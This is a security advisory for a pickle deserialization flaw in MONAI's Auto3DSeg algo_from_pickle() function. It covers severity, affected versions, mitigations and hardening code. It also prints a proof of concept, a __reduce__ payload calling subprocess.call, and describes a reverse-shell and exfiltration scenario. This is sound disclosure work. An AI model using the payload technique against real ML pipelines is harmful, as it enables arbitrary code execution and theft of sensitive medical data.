GHSA-89gg-p5r5-q6r4: MONAI: pickle deserialization RCE in Auto3DSeg

GHSA-89gg-p5r5-q6r4 HIGH
Published April 7, 2026
CISO Take

MONAI's Auto3DSeg module deserializes pickle files via algo_from_pickle() with zero input validation, allowing any actor who can supply a crafted .pkl file to achieve arbitrary code execution with ML pipeline privileges. With 99 downstream dependents and MONAI widely deployed in clinical and research medical imaging workflows, the blast radius is significant — a single poisoned algorithm checkpoint can cascade to full host compromise, including access to sensitive patient imaging datasets. Although the CVSS vector rates attack complexity as high and requires privileged access and user interaction, the actual exploit payload is a five-line Python script using only the standard library, making weaponization trivial once an attacker influences which files the pipeline loads. Upgrade immediately to MONAI 1.5.2; in the interim, enforce strict write-access controls on all directories containing .pkl files consumed by auto3dseg pipelines.

Sources: GitHub Advisory, ATLAS, OpenSSF

Risk Assessment

High severity with critical-when-triggered impact profile: CVSS scope change plus C:H/I:H/A:H means full system compromise including data exfiltration and persistence when conditions are met. The AC:H and PR:H ratings reduce opportunistic exploitation likelihood, but insider threats, shared-storage poisoning, and supply chain scenarios in research GPU clusters are highly plausible. No EPSS data, not in CISA KEV, no public exploit tool yet — but the advisory's PoC is trivially reproducible. Medical imaging AI environments processing protected health information face compounded regulatory exposure under HIPAA alongside the technical risk.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---------|-----------|------------------|---------|
| monai   | pip       | <= 1.5.1         | 1.5.2   |


Severity & Risk

- CVSS 3.1: 7.7 / 10
- EPSS: N/A
- Exploitation Status: No known exploitation
- Sophistication: Trivial

Recommended Action

  1. Upgrade monai to >=1.5.2 immediately — the official patch is available as of 2026-04-05.
  2. Audit all direct and transitive calls to algo_from_pickle() across your codebase, Jupyter notebooks, and CI/CD pipelines.
  3. Until patched, restrict write access to directories from which .pkl files are loaded to only the owning process account — deny write access for all other identities.
  4. Implement SHA-256 manifest files with cryptographic signatures for all serialized algorithm artifacts; verify before loading.
  5. Consider migrating algorithm persistence to safe serialization formats (JSON configs + safetensors weights) for new pipelines.
  6. Add SIEM/EDR rules to alert on subprocess execution spawned by Python ML training processes — this is the primary post-exploitation indicator.
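Step 4 above can be sketched with the standard library alone. The helper names (`write_manifest`, `verify_before_load`) are illustrative, not part of any MONAI API, and the manifest here is an unsigned SHA-256 digest file; a production setup would additionally sign the manifest (e.g. with GPG or Sigstore) as the step recommends.

```python
import hashlib
import json
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def write_manifest(artifact_dir: Path, manifest_path: Path) -> None:
    """Record the digest of every .pkl artifact in a JSON manifest.

    Run this from a trusted context at artifact-publication time,
    before the files land on shared storage.
    """
    manifest = {p.name: sha256_of(p) for p in sorted(artifact_dir.glob("*.pkl"))}
    manifest_path.write_text(json.dumps(manifest, indent=2))


def verify_before_load(pkl_path: Path, manifest_path: Path) -> None:
    """Refuse to proceed unless the artifact matches its recorded digest."""
    manifest = json.loads(manifest_path.read_text())
    expected = manifest.get(pkl_path.name)
    if expected is None or sha256_of(pkl_path) != expected:
        raise RuntimeError(f"untrusted artifact, refusing to deserialize: {pkl_path}")
```

The point of the ordering is that `verify_before_load` runs before any `pickle.loads` call, so a tampered or unknown artifact is rejected before its bytes ever reach the deserializer.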

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
- Article 15 - Accuracy, robustness and cybersecurity
- Article 9 - Risk management system

ISO 42001
- A.6.2 - Data for AI systems
- A.8.2 - AI system security

NIST AI RMF
- GV-1.7 - Processes for AI risk tracking and response
- MS-2.5 - Manage AI risks from third-party components

Technical Details

NVD Description

### Summary

The `algo_from_pickle` function in `monai/auto3dseg/utils.py` passes file contents directly to `pickle.loads(data_bytes)` without performing any validation on the input. This results in insecure deserialization and can lead to arbitrary code execution.

### Details

PoC — generate the malicious file `attack_algo.pkl`:

```
import pickle
import subprocess

class MaliciousAlgo:
    def __reduce__(self):
        return (subprocess.call, (['calc.exe'],))

malicious_algo_bytes = pickle.dumps(MaliciousAlgo())
attack_data = {
    "algo_bytes": malicious_algo_bytes,
}

attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
    f.write(pickle.dumps(attack_data))
```

Loading the crafted file then triggers command execution via `pickle.loads`:

```
from monai.auto3dseg.utils import algo_from_pickle

attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
```

Root cause of the vulnerability:

```
def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
    with open(pkl_filename, "rb") as f_pi:
        data_bytes = f_pi.read()
    data = pickle.loads(data_bytes)
```

### Impact

Arbitrary code execution.

Remediation suggestion: verify the data source and content before deserializing, or use a safe deserialization method.
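The "safe deserialization method" the advisory suggests can take the form of the allowlisting pattern documented in Python's own `pickle` module docs: subclass `pickle.Unpickler` and override `find_class` so that only explicitly approved globals can be resolved. The sketch below is illustrative and is not the upstream MONAI 1.5.2 fix; `SAFE_GLOBALS` is a hypothetical allowlist that a real deployment would have to curate for its own artifact schema.

```python
import io
import pickle

# Allowlisted (module, name) pairs. Anything outside this set is rejected
# at deserialization time, before any attacker-chosen callable (such as a
# __reduce__ payload pointing at subprocess.call) can run.
SAFE_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads with an allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Against the PoC above, `restricted_loads` raises `UnpicklingError` when the pickle stream references `subprocess.call`, because `find_class` fires before the payload's callable is ever invoked.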

Exploitation Scenario

An adversary with write access to a shared NAS, S3 bucket, or MLflow artifact store used by an Auto3DSeg hyperparameter optimization cluster crafts a malicious .pkl file using the published PoC — a subprocess.call payload wrapped in a Python class with a custom __reduce__ method. When the automated training pipeline or an ML engineer calls algo_from_pickle() to resume an experiment or load a previously searched algorithm configuration, the payload silently executes during deserialization: a reverse shell is established, GPU cluster credentials are harvested, and model weights alongside DICOM training data are exfiltrated to attacker-controlled storage. In air-gapped clinical AI environments, the same attack vector can be delivered via a compromised developer workstation or a poisoned shared experiment artifact committed to a collaborative repository.
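The post-exploitation indicator named in recommendation 6 (subprocess execution spawned from a Python ML process) can also be surfaced from inside the interpreter itself. This is a minimal sketch using CPython's audit-hook mechanism (PEP 578, Python 3.8+), not a substitute for SIEM/EDR coverage; the `ALERTS` buffer is a stand-in for whatever log sink a deployment actually forwards to.

```python
import sys

# In-process record of spawned subprocesses; replace with a real log sink.
ALERTS = []


def audit_hook(event, args):
    # "subprocess.Popen" fires for every process spawn initiated from
    # Python, which for a training job is the primary post-exploitation
    # indicator of a deserialization payload going off.
    if event == "subprocess.Popen":
        executable, cmd_args, cwd, env = args
        ALERTS.append((executable, cmd_args))


# Audit hooks cannot be removed once installed; register at process start.
sys.addaudithook(audit_hook)
```

A training container would install this hook in its entrypoint (e.g. via `sitecustomize.py`) so that any subprocess spawned by a poisoned pickle shows up in the alert stream even before host-level EDR notices the child process.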

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

Timeline

- Published: April 7, 2026
- Last Modified: April 7, 2026
- First Seen: April 8, 2026

Related Vulnerabilities